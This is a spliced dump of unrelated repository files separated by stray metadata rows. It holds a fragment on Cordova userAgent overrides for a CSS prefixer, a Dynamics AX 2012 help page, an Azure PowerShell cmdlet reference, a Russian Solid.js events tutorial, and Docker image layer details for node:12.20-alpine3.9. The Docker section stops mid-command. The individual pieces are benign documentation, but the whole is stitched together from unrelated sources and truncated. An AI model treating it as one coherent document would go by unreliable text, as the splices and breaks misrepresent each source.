occurred on iOS 8.4.x. <br> For **Cordova/Phonegap** there is a method of changing the userAgent. I'd suggest one that gets recognized by bowser. 
```xml <preference name="OverrideUserAgent" value="/* userAgent */" /> ``` For both I also recommend enabling the `keepUnprefixed` option. > I hope that we will be able to support those out of the box as soon as possible.
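For the server-side rendering case above, a minimal sketch of picking the userAgent from the incoming request (the helper name and fallback UA are illustrative; it assumes the prefixer constructor accepts a `userAgent` option, as hinted at by the `new Prefixer()` snippet above):

```javascript
// Prefer the client's own userAgent from the request headers; fall back
// to a known Chrome UA so prefixing still produces sensible output.
const FALLBACK_UA =
  'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2454.85 Safari/537.36'

function resolveUserAgent(req) {
  return (req && req.headers && req.headers['user-agent']) || FALLBACK_UA
}

// Hypothetical usage inside a request handler:
// const prefixer = new Prefixer({ userAgent: resolveUserAgent(req) })
```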
61.617647
325
0.756086
eng_Latn
0.984828
6f60ed1d7f718bdfa98b75468e640c31215b9573
1,663
md
Markdown
dynamicsax2012-technet/add-details-to-a-case.md
RobinARH/DynamicsAX2012-technet
d0d0ef979705b68e6a8406736612e9fc3c74c871
[ "CC-BY-4.0", "MIT" ]
null
null
null
dynamicsax2012-technet/add-details-to-a-case.md
RobinARH/DynamicsAX2012-technet
d0d0ef979705b68e6a8406736612e9fc3c74c871
[ "CC-BY-4.0", "MIT" ]
null
null
null
dynamicsax2012-technet/add-details-to-a-case.md
RobinARH/DynamicsAX2012-technet
d0d0ef979705b68e6a8406736612e9fc3c74c871
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Add details to a case TOCTitle: Add details to a case ms:assetid: ed8a7326-8378-4270-bccc-35d38b1b9355 ms:mtpsurl: https://technet.microsoft.com/en-us/library/Hh227501(v=AX.60) ms:contentKeyID: 36059905 ms.date: 04/18/2014 mtps_version: v=AX.60 audience: Application User ms.search.region: Global --- # Add details to a case _**Applies To:** Microsoft Dynamics AX 2012 R3, Microsoft Dynamics AX 2012 R2, Microsoft Dynamics AX 2012 Feature Pack, Microsoft Dynamics AX 2012_ After you create a case, you can add activities, dependent cases, associations, case log information, documents, and responsibilities to the case. You can add these details when you first create the case or you can add them later as needed. 1. Click **Home** \> **Common** \> **Cases** \> **All cases**. 2. Double-click the case that you want to update. 3. Select the tab that corresponds to the information that you want to add to the case. Use the following information to complete this task: - **Case log** tab – Click **Add** to create a new case log information line and enter the appropriate information. Click **Details** to open the **Source type** form to view source types for lead and opportunity records. - **Associations** tab – Click **Add** to create a new line and add information about an entity that is associated with the case that you are currently working on. - **Knowledge article** tab – Click **Add** to add knowledge article information to the case. Click **Details** to open the **Knowledge article** form. ## See also [Create a case](create-a-case.md) [Case management](case-management.md)
38.674419
240
0.726398
eng_Latn
0.972696
6f611cfbd2571a7c55bce0f4b7b38e4518a6daa7
1,477
md
Markdown
articles/human-resources/hr-admin-integration-ats-api-gender.md
MicrosoftDocs/Dynamics-365-Operations.et-ee
dc7d4df9666186a929909ca4d7f4ca8b41df301d
[ "CC-BY-4.0", "MIT" ]
2
2020-05-18T17:13:59.000Z
2021-04-20T21:13:45.000Z
articles/human-resources/hr-admin-integration-ats-api-gender.md
MicrosoftDocs/Dynamics-365-Operations.et-ee
dc7d4df9666186a929909ca4d7f4ca8b41df301d
[ "CC-BY-4.0", "MIT" ]
7
2017-12-08T15:04:50.000Z
2019-04-30T11:45:50.000Z
articles/human-resources/hr-admin-integration-ats-api-gender.md
MicrosoftDocs/Dynamics-365-Operations.et-ee
dc7d4df9666186a929909ca4d7f4ca8b41df301d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Gender description: This topic describes the Gender option set for Dynamics 365 Human Resources. author: jaredha ms.date: 02/05/2021 ms.topic: article ms.prod: '' ms.technology: '' audience: Application User ms.custom: '' ms.assetid: '' ms.search.region: Global ms.author: jaredha ms.search.validFrom: 2021-02-05 ms.dyn365.ops.version: Human Resources ms.openlocfilehash: 4fa74ef1b4f6f2cc11051abda76d9edd8539b2659c1700f7aa34c3e5359bd394 ms.sourcegitcommit: 42fe9790ddf0bdad911544deaa82123a396712fb ms.translationtype: HT ms.contentlocale: et-EE ms.lasthandoff: 08/05/2021 ms.locfileid: "6721627" --- # <a name="gender"></a>Gender [!include [Applies to Human Resources](../includes/applies-to-hr.md)] This topic describes the Gender option set for Dynamics 365 Human Resources. Physical name: mshr_hcmpersongender This enumeration provides the option set for the candidate's gender. It is available in the mshr_hcmpersongender option set. | Value | Label | Description | | --- | --- | --- | | 200000000 | None | Gender isn't specified. | | 200000001 | Male | Male. | | 200000002 | Female | Female. | | 200000003 | NonSpecific | Non-specific gender option. | ## <a name="see-also"></a>See also [Applicant tracking system integration API introduction](hr-admin-integration-ats-api-introduction.md)<br> [Candidate to hire example query](hr-admin-integration-ats-api-candidate-to-hire-example-query.md) [!INCLUDE[footer-include](../includes/footer-banner.md)]
32.108696
108
0.77522
est_Latn
0.806286
6f617c81c0dc15f27004d418a3d1f9c337ec2522
5,552
md
Markdown
azps-3.2.0/Az.DataShare/Remove-AzDataShareSynchronizationSetting.md
vladimirf7/azure-docs-powershell
3ff03c91cee2b137f85eded1db721b46c118e413
[ "CC-BY-4.0", "MIT" ]
2
2020-07-18T09:52:49.000Z
2021-07-20T20:07:58.000Z
azps-3.2.0/Az.DataShare/Remove-AzDataShareSynchronizationSetting.md
vladimirf7/azure-docs-powershell
3ff03c91cee2b137f85eded1db721b46c118e413
[ "CC-BY-4.0", "MIT" ]
59
2018-08-16T07:17:59.000Z
2020-10-28T07:14:21.000Z
azps-3.2.0/Az.DataShare/Remove-AzDataShareSynchronizationSetting.md
vladimirf7/azure-docs-powershell
3ff03c91cee2b137f85eded1db721b46c118e413
[ "CC-BY-4.0", "MIT" ]
1
2021-05-18T04:39:18.000Z
2021-05-18T04:39:18.000Z
--- external help file: Microsoft.Azure.PowerShell.Cmdlets.DataShare.dll-Help.xml Module Name: Az.DataShare online version: https://docs.microsoft.com/en-us/powershell/module/az.datashare/remove-azdatasharesynchronizationsetting schema: 2.0.0 content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/DataShare/DataShare/help/Remove-AzDataShareSynchronizationSetting.md original_content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/DataShare/DataShare/help/Remove-AzDataShareSynchronizationSetting.md --- # Remove-AzDataShareSynchronizationSetting ## SYNOPSIS Removes a synchronization setting. ## SYNTAX ### ByFieldsParameterSet (Default) ``` Remove-AzDataShareSynchronizationSetting -ResourceGroupName <String> -AccountName <String> -ShareName <String> -Name <String> [-PassThru] [-AsJob] [-DefaultProfile <IAzureContextContainer>] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ### ByResourceIdParameterSet ``` Remove-AzDataShareSynchronizationSetting -ResourceId <String> [-PassThru] [-AsJob] [-DefaultProfile <IAzureContextContainer>] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ### ByObjectParameterSet ``` Remove-AzDataShareSynchronizationSetting -InputObject <PSDataShareSynchronizationSetting> [-PassThru] [-AsJob] [-DefaultProfile <IAzureContextContainer>] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ## DESCRIPTION The **Remove-AzDataShareSynchronizationSetting** cmdlet removes a data share synchronization setting. ## EXAMPLES ### Example 1 ``` PS C:\> Remove-AzDataShareSynchronizationSetting -ResourceGroupName "ADS" -AccountName "WikiAds" -ShareName "AdsShare" -Name "AdsShareSynchronizationSetting" Are you sure you want to remove synchronization-setting "AdsShareSynchronizationSetting"? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y ``` This command removes a synchronization setting named AdsShareSynchronizationSetting from the share AdsShare. 
## PARAMETERS ### -AccountName Azure Data Share Account name ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -AsJob Run cmdlet in the background. ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -DefaultProfile The credentials, account, tenant, and subscription used for communication with Azure. ```yaml Type: Microsoft.Azure.Commands.Common.Authentication.Abstractions.Core.IAzureContextContainer Parameter Sets: (All) Aliases: AzContext, AzureRmContext, AzureCredential Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -InputObject The Azure Data Share Synchronization setting. ```yaml Type: Microsoft.Azure.PowerShell.Cmdlets.DataShare.Models.PSDataShareSynchronizationSetting Parameter Sets: ByObjectParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: True (ByValue) Accept wildcard characters: False ``` ### -Name Synchronization setting name ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -PassThru Return object (if specified). 
```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -ResourceGroupName The resource group name of the azure data share account ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -ResourceId The resource id of the synchronization setting ```yaml Type: System.String Parameter Sets: ByResourceIdParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: True (ByPropertyName) Accept wildcard characters: False ``` ### -ShareName Azure data share name ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Confirm Prompts you for confirmation before running the cmdlet. ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: cf Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -WhatIf Shows what would happen if the cmdlet runs. The cmdlet is not run. ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: wi Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216). 
## INPUTS ### System.String ### Microsoft.Azure.PowerShell.Cmdlets.DataShare.Models.PSDataShareSynchronizationSetting ## OUTPUTS ### System.Boolean ## NOTES ## RELATED LINKS
23.525424
314
0.790526
yue_Hant
0.651353
6f618e2be87c1de95c937af84e5f7bfa1d1178b9
1,486
md
Markdown
langs/ru/tutorials/bindings_events/lesson.md
cheasea/solid-docs
0db4ddd731e689d4d16e82923d65c2b8319bedff
[ "MIT" ]
51
2021-07-18T22:31:35.000Z
2022-03-23T00:43:10.000Z
langs/ru/tutorials/bindings_events/lesson.md
cheasea/solid-docs
0db4ddd731e689d4d16e82923d65c2b8319bedff
[ "MIT" ]
67
2021-07-19T15:32:40.000Z
2022-03-28T07:46:43.000Z
langs/ru/tutorials/bindings_events/lesson.md
cheasea/solid-docs
0db4ddd731e689d4d16e82923d65c2b8319bedff
[ "MIT" ]
49
2021-07-19T15:46:21.000Z
2022-03-19T15:55:31.000Z
Events in Solid are attributes prefixed with `on`. They are special in a few ways. First, they are not included in the reactive wrappers. In many cases it is hard to tell the difference between a `Signal` and an event handler. Since events are simply called, they don't need reactivity to update; they are bound only once. You can always have your handler perform different operations depending on the current state of your application. Standard UI events (those that bubble and are composed) are automatically delegated to the document. To improve delegation performance, Solid supports an array syntax that calls the handler with data without creating additional closures: ```jsx const handler = (data, event) => /*...*/ <button onClick={[handler, data]}>Click Me</button> ``` For example, let's attach a handler to the `mousemove` event: ```jsx <div onMouseMove={handleMouseMove}> The mouse position is {pos().x} x {pos().y} </div> ``` All `on` attributes are case-insensitive, which means event names need to be lowercase. For example, `onMouseMove` monitors the `mousemove` event. If you need to support other casings, or don't want to use event delegation, you can use the `on:` prefix to match event names after the colon: ```jsx <button on:DOMContentLoaded={() => /* any action */} >Click Me</button> ```
61.916667
488
0.777254
rus_Cyrl
0.992228
6f61d25296f3fcf78853a19e33ce47ef63e3a080
34,240
md
Markdown
repos/node/remote/12.20-alpine3.9.md
PaulinaParangerHr/repo-info
b2ca979c1177fad04b963a99bc49590bf390730f
[ "Apache-2.0" ]
null
null
null
repos/node/remote/12.20-alpine3.9.md
PaulinaParangerHr/repo-info
b2ca979c1177fad04b963a99bc49590bf390730f
[ "Apache-2.0" ]
null
null
null
repos/node/remote/12.20-alpine3.9.md
PaulinaParangerHr/repo-info
b2ca979c1177fad04b963a99bc49590bf390730f
[ "Apache-2.0" ]
null
null
null
## `node:12.20-alpine3.9` ```console $ docker pull node@sha256:16d40e6c2858ee41cc7e19bb36f8a92718ad935ceae036e88dcffb68041dea6c ``` - Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json` - Platforms: - linux; amd64 - linux; arm variant v6 - linux; arm variant v7 - linux; arm64 variant v8 - linux; ppc64le - linux; s390x ### `node:12.20-alpine3.9` - linux; amd64 ```console $ docker pull node@sha256:ed9251aca55330890ef48a274c6ce03052e5438e87b6101b0bab5362ac79b5e5 ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **29.5 MB (29503137 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:a7d6e4c06dd4f80d3ba52db58f3c7421f6c29497ddf084928103d71b6635314c` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Fri, 24 Apr 2020 01:05:35 GMT ADD file:a0afd0b0db7f9ee9496186ead087ec00edd1386ea8c018557d15720053f7308e in / # Fri, 24 Apr 2020 01:05:35 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 17:30:57 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 17:31:09 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make 
python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. 
&& rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 17:31:10 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 17:31:15 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 17:31:15 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 17:31:16 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 17:31:16 GMT CMD ["node"] ``` - Layers: - `sha256:31603596830fc7e56753139f9c2c6bd3759e48a850659506ebfb885d1cf3aef5` Last Modified: Fri, 24 Apr 2020 01:06:12 GMT Size: 2.8 MB (2773413 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f5b0d1ce6f59dcbee12d1ce6f4093fa9a7939c7751f00ff2137b4651dcf2de8f` Last Modified: Tue, 05 Jan 2021 17:48:53 GMT Size: 24.5 MB (24490884 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 
`sha256:55922cf6f31687a003e818aab6c5e42db644b2be19a1c74040d750db3d63354c` Last Modified: Tue, 05 Jan 2021 17:48:48 GMT Size: 2.2 MB (2238557 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:e8a7c0650cafa577c71ba40f4423d3486d700990904de11327a69bdff61d1a92` Last Modified: Tue, 05 Jan 2021 17:48:47 GMT Size: 283.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; arm variant v6 ```console $ docker pull node@sha256:14c5972c4890dc28f1ef2d0a36a3880f473f6442abd408c9c00c4bc785a19f1a ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **28.8 MB (28796885 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:84df833a8691eaac8ee05dfa2d8c2f9d4397458f3f18aa26ad15ac01ee4f1436` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 15:51:44 GMT ADD file:7dd2657543fac7f63a125194d27bd38a8e472a3076831a2331c43a471794c210 in / # Thu, 23 Apr 2020 15:51:45 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 18:58:29 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 19:10:34 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full 
binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. 
&& rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 19:10:35 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 19:10:42 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 19:10:43 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 19:10:43 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 19:10:44 GMT CMD ["node"] ``` - Layers: - `sha256:27da80392aebe463671b839837d59af1261218364b4261ceb2eca0f814075270` Last Modified: Thu, 23 Apr 2020 15:52:21 GMT Size: 2.5 MB (2548725 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d06dd7b9d4c628e6d26b0be6a8c91e35766a77fd4f32fb8116a8d4a048184fd8` Last Modified: Tue, 05 Jan 2021 19:38:02 GMT Size: 24.0 MB (23957475 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - 
`sha256:1fa53b3bcf9984526fc9aa3de4e141a1e610376335001c24178ff1493c50f4e5` Last Modified: Tue, 05 Jan 2021 19:37:51 GMT Size: 2.3 MB (2290404 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:ef482270beeddc6c4d2a61351004c191b6e4d37f71c51f7ef72804da4bd14d2f` Last Modified: Tue, 05 Jan 2021 19:37:51 GMT Size: 281.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; arm variant v7 ```console $ docker pull node@sha256:a5b3cac6ecc882616fa7e54263b0a8be40b2bcdf077e3889e75534cd008077fd ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **28.2 MB (28182437 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:6f34f16820985558ae574b1167649e6a09c21becfe91d50f056052ec4198548e` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 22:04:56 GMT ADD file:5cfee90da24e94bf9a1c0f2ba8e03667ab5be058c265cc072bd60517c5e37eb4 in / # Thu, 23 Apr 2020 22:04:58 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 19:12:04 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 19:21:15 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full 
binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. 
&& rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 19:21:16 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 19:21:22 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar 